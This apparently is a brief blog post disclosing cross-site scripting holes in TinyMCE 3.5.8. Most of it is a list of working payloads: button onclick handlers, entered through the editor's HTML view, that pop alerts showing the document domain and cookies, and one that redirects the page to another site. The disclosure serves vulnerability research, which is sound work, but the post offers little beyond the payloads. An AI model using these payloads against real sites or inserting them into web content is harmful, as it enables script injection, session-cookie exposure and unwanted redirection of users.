TinyMCE 3.5.8 XSS - Payload examples

By viewing the TinyMCE examples directory, a number of XSS vulnerabilities can be found by editing the HTML, using the HTML option from the WYSIWYG.

Adding each as shown below displays the XSS by popping a message box.

XSS - Examples

Only Integers 0 - 9 (Numerical only)
onclick=alert(6)//<button onclick="alert(6)//"> */ alert(6)//</button>

With Back ticks All letters `WORDS`
onclick=alert(6)//<button onclick="alert(`WORDS`)//"> */ alert(6)//</button>

onclick=alert(1)//<button onclick="prompt(document.domain)//"> */ alert(1)//</button>

Document.Domain Pop Up Alert
onclick=alert(1)//<button onclick="alert(document.domain)//"> */ alert(1)//</button>

Document.Cookie Pop Up Alert
onclick=alert(1)//<button onclick="alert(document.cookie)//"> */ alert(1)//</button>

Website Redirection from within TinyMCE
onclick=alert(1)//<button onclick="window.location='https://www.slashdot.org'//"> */ alert(1)//</button>

No comments:

Post a comment